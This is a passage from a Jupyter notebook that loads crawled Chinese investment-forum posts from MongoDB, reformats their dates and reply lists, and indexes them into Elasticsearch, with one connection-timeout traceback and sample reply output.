159 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36mnext\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1187\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__empty\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1188\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mStopIteration\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1189\u001b[1;33m \u001b[1;32mif\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_refresh\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1190\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__manipulate\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1191\u001b[0m \u001b[0m_db\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
160 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m_refresh\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1124\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclient\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1125\u001b[0m self.__max_await_time_ms)\n\u001b[1;32m-> 1126\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__send_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1127\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1128\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
161 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m__send_message\u001b[1;34m(self, operation)\u001b[0m\n\u001b[0;32m 929\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 930\u001b[0m response = client._send_message_with_response(\n\u001b[1;32m--> 931\u001b[1;33m operation, exhaust=self.__exhaust, address=self.__address)\n\u001b[0m\u001b[0;32m 932\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__address\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mresponse\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 933\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__exhaust\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
162 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_send_message_with_response\u001b[1;34m(self, operation, exhaust, address)\u001b[0m\n\u001b[0;32m 1143\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__all_credentials\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1144\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_event_listeners\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1145\u001b[1;33m exhaust)\n\u001b[0m\u001b[0;32m 1146\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1147\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_reset_on_error\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mserver\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
163 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_reset_on_error\u001b[1;34m(self, server, func, *args, **kwargs)\u001b[0m\n\u001b[0;32m 1154\u001b[0m \"\"\"\n\u001b[0;32m 1155\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1156\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1157\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1158\u001b[0m \u001b[1;31m# The socket has been closed. Don't reset the server.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
164 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\server.py\u001b[0m in \u001b[0;36msend_message_with_response\u001b[1;34m(self, operation, set_slave_okay, all_credentials, listeners, exhaust)\u001b[0m\n\u001b[0;32m 104\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 105\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msend_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mdata\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmax_doc_size\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 106\u001b[1;33m \u001b[0mreply\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mreceive_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mrequest_id\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 107\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 108\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mpublish\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
165 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 610\u001b[0m self.max_message_size)\n\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 612\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 613\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 614\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_raise_if_not_writable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0munacknowledged\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
166 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(self, error)\u001b[0m\n\u001b[0;32m 741\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 742\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 743\u001b[1;33m \u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 744\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 745\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
167 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(address, error, msg_prefix)\u001b[0m\n\u001b[0;32m 281\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 282\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 283\u001b[1;33m \u001b[1;32mraise\u001b[0m \u001b[0mAutoReconnect\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 284\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 285\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n",
168 | "\u001b[1;31mAutoReconnect\u001b[0m: 10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。"
169 | ]
170 | }
171 | ],
172 | "source": [
173 | "url_set = set()\n",
174 | "for item in doc.find():\n",
175 | " creator=item.get('creator')\n",
176 | " title=item.get('title')\n",
177 | " content=item.get('content')\n",
178 | " resp_no=item.get('resp_no')\n",
179 | " createTime=item.get('createTime')\n",
180 | " \n",
181 | " url=item.get('url')\n",
182 | " if url in url_set:\n",
183 | " continue\n",
184 | " else:\n",
185 | " url_set.add(url)\n",
186 | " \n",
187 | " if createTime is None:\n",
188 | " save_db.insert_one({'url':url})\n",
189 | " continue\n",
190 | " \n",
191 | " createTime=datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
192 | "\n",
193 | " crawlTime=item.get('crawlTime')\n",
194 | " crawlTime=datetime.datetime.strptime(crawlTime,'%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S')\n",
195 | "\n",
196 | " \n",
197 | " resp_list=item.get('resp')\n",
198 | " last_resp_date=item.get('last_resp_date')\n",
199 | " last_resp_date=datetime.datetime.strptime(last_resp_date,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n",
200 | "\n",
201 | " _resp_list=[]\n",
202 | " for sub_resp in resp_list:\n",
203 | " resp_author = list(sub_resp.keys())[0]\n",
204 | " _resp_author=''.join(resp_author.split('_')[:-1])\n",
205 | " agree=sub_resp[resp_author][0]\n",
206 | " resp_content=sub_resp[resp_author][1]\n",
207 | " d={}\n",
208 | " d['resp_agree']=int(agree)\n",
209 | " d['resp_author']=_resp_author\n",
210 | " d['resp_content']=resp_content\n",
211 | "\n",
212 | " _resp_list.append(d)\n",
213 | " # last_resp_date=item.get('last_resp_date')\n",
214 | "\n",
215 | " body = {\n",
216 | " 'creator':creator,\n",
217 | " 'title':title,\n",
218 | " 'content':content,\n",
219 | " 'resp_no':int(resp_no),\n",
220 | " 'createTime':createTime,\n",
221 | " 'crawlTime':crawlTime,\n",
222 | " 'url':url,\n",
223 | " 'resp':_resp_list,\n",
224 | " 'last_resp_date':last_resp_date\n",
225 | " }\n",
226 | "\n",
227 | " es.index(index='jsl',doc_type='doc',body=body)"
228 | ]
229 | },
230 | {
231 | "cell_type": "code",
232 | "execution_count": 23,
233 | "metadata": {},
234 | "outputs": [
235 | {
236 | "data": {
237 | "text/plain": [
238 | "'2019-03-16 09:54:43'"
239 | ]
240 | },
241 | "execution_count": 23,
242 | "metadata": {},
243 | "output_type": "execute_result"
244 | }
245 | ],
246 | "source": [
247 | "crawlTime"
248 | ]
249 | },
250 | {
251 | "cell_type": "code",
252 | "execution_count": 19,
253 | "metadata": {},
254 | "outputs": [
255 | {
256 | "data": {
257 | "text/plain": [
258 | "[{'resp_agree': 0,\n",
259 | " 'resp_author': 'seeker24680',\n",
260 | " 'resp_content': '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。'},\n",
261 | " {'resp_agree': 0,\n",
262 | " 'resp_author': 'joyfulli',\n",
263 | " 'resp_content': '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了'},\n",
264 | " {'resp_agree': 0, 'resp_author': '老高0813', 'resp_content': '基本没卵用'},\n",
265 | " {'resp_agree': 0, 'resp_author': 'z383788052', 'resp_content': '从来只看指标,只看k'},\n",
266 | " {'resp_agree': 0,\n",
267 | " 'resp_author': '花园小琴',\n",
268 | " 'resp_content': '看图形,一般只看低买高卖,但事后后悔,赚少了'},\n",
269 | " {'resp_agree': 0,\n",
270 | " 'resp_author': '风险搬运工',\n",
271 | " 'resp_content': '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。'},\n",
272 | " {'resp_agree': 0,\n",
273 | " 'resp_author': 'smag',\n",
274 | " 'resp_content': '基本不看指标,静下心感受波动,在波动中下注。。。'},\n",
275 | " {'resp_agree': 0, 'resp_author': '海浪头头', 'resp_content': '同意美棠子的看法'},\n",
276 | " {'resp_agree': 0,\n",
277 | " 'resp_author': 'jsl0900',\n",
278 | " 'resp_content': '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题'},\n",
279 | " {'resp_agree': 4,\n",
280 | " 'resp_author': '美棠子',\n",
281 | " 'resp_content': '只是个辅助工具,基本面是核心,切不可颠倒主次。'},\n",
282 | " {'resp_agree': 0, 'resp_author': '蔓越橘', 'resp_content': '用于T一下可以,其他就算了吧。'}]"
283 | ]
284 | },
285 | "execution_count": 19,
286 | "metadata": {},
287 | "output_type": "execute_result"
288 | }
289 | ],
290 | "source": [
291 | "_resp_list"
292 | ]
293 | },
294 | {
295 | "cell_type": "code",
296 | "execution_count": null,
297 | "metadata": {
298 | "scrolled": true
299 | },
300 | "outputs": [],
301 | "source": [
302 | "for item in doc.find_one():\n"
303 | ]
304 | },
305 | {
306 | "cell_type": "code",
307 | "execution_count": null,
308 | "metadata": {},
309 | "outputs": [],
310 | "source": [
311 | "db"
312 | ]
313 | }
314 | ],
315 | "metadata": {
316 | "kernelspec": {
317 | "display_name": "Python 3",
318 | "language": "python",
319 | "name": "python3"
320 | },
321 | "language_info": {
322 | "codemirror_mode": {
323 | "name": "ipython",
324 | "version": 3
325 | },
326 | "file_extension": ".py",
327 | "mimetype": "text/x-python",
328 | "name": "python",
329 | "nbconvert_exporter": "python",
330 | "pygments_lexer": "ipython3",
331 | "version": "3.7.0"
332 | }
333 | },
334 | "nbformat": 4,
335 | "nbformat_minor": 2
336 | }
337 |
--------------------------------------------------------------------------------